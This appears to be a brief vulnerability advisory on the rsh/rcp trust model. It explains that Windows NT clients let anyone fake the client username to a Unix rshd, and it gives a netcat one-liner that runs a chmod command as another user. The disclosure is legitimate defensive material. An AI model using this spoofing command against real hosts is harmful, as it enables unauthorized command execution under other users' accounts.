COMMAND

    rsh/rcp

SYSTEMS AFFECTED

    Win NT and unices

PROBLEM

    Eric Gisin found following.  This  is really a UNIX rshd bug,  but
    it affects users of  the NT clients.   It's old news that  the BSD
    rsh/rcp services are not secure, however rshd is still is  enabled
    in many UNIX  systems.  There  are rsh/rcp clients  in Windows NT,
    and people are not aware of the ease of defeating security in this
    environment.  The security of this service is based on  privileged
    ports,  which  are  not  widely  implemented.   The NT versions of
    rcp/rsh have no special privileges like the UNIX versions.  Anyone
    can modify the source or  use netcat to fake the  client username.
    For example,

        D:> nc -v unixhost 514 -p 666
        ^@newbie^@newbie^@chmod a= .^@

    This will execute the chmod command under newbie's account, if  he
    permits access from that client machine in .rhosts.  Basically the
    problem is since Windows  NT includes rsh/rcp, people  assume it's
    as secure as the UNIX counterpart, which is not the case.

SOLUTION

    Nothing yet.